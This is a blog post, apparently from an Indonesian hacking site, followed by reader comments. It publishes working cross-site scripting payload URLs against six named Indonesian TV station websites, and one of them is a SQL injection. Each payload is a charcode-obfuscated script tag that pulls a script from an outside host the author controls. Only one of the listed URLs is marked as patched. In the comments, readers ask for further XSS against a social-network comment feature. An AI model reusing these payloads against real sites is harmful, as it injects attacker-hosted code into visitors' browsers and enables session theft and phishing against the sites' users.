XSS On Indo TV Stations

Posted by: Joy  :  Category: Vulnerability

XSSEDHere, we’re gonna show you XSS (Cross Site Scripting) and XFS (XSS From SQLi) bugs on some Indo TV Stations Websites.

As you might already know that Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. As of 2007, cross-site scripting carried out on websites were roughly 80% of all documented security vulnerabilities. Often during an attack everything looks fine to the end-user who may be subject to unauthorized access, theft of sensitive data, and financial loss (Taken from wikipedia).

Here are some examples of their vulnerable URL :

= TransTV =

http://transtv.co.id/200706/sinopsispers.asp (Patched)

http://transtv.co.id/200706/programs.asp?aboutus=%22%3E%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115, 99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122, 121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34, 62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= SCTV =

http://sctv.co.id/search.php?s=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115,99,114,105, 112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97, 118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62))%3C/script%3E

= Indosiar =

http://indosiar.com/search?doSearch=true&qword=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode (60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114, 97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104, 112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= GlobalTV =

http://globaltv.co.id/v2/index.php?r=c2VhcmNoLnBocA%3D%3D&kw= %3Cscript%3Edocument.write%28String.fromCharCode%2860,115,99,114, 105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100, 97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62%29%29%3C/script%3E

= TVRI =

http://tvri.co.id/detail_galeri.php?id=24%27%3Cscript id=CrazydaVinci%3Edocument.write%28String.fromCharCode %2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99, 114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112, 104,112,34,62,60,47,115,99,114,105,112,116,62%29%29%3C/script%3E

= ANTV =

This is the worst among them, their site are vulnerable to XSS and SQL injection. But, as the topic in this post is only about XSS, we will only show you the XFS (XSS From SQLi) on their site :
http://an.tv/s/?sid=null+union+select+char%2860,115,99,114,105,112,116,32,115, 114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99, 105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105, 112,116,62%29,0–-

Let’s make indonesian sites better. ;)


8 Responses to “XSS On Indo TV Stations”

  1. 1
    Candra Says:

    moga2 webmaster site yg bersangkutan tau

  2. 2
    Pintuz Says:

    keren2…seep dah
    petramax^^

  3. 3
    Black Shell Says:

    Om joy emang mantabzz dah,,,
    hahahaha

  4. 4
    Rio Says:

    Weits, UNBELIEVABLE i ♥ Mr.Joy :)

  5. 5
    Rio Says:

    Mr.Joy i want to know the latest XSS on FS comment, huhu Thank Alot, can you pass (menenbus) it? he

    offttopic? FS nya suspend knp bang?huhu

  6. 6
    heri Says:

    om cemana sih buat wibset kayak gini……..
    bagus banget…….

  7. 7
    Joy Says:

    @rio
    comment linker? sorry to say that for our safety, even it’s available or not, no more comment linker on public. ah yes :D my profile was suspended because of the no_one widget v2, i’m more into fb now ;)

    @heri
    ini basenya wordpress bro heri, tinggal ditweak aja.. :)

  8. 8
    kopies Says:

    mantab bro..

    minta ajarin yang FB dunk. ahhahaa.
    uda ada email ak tuh. heheh.

Leave a Reply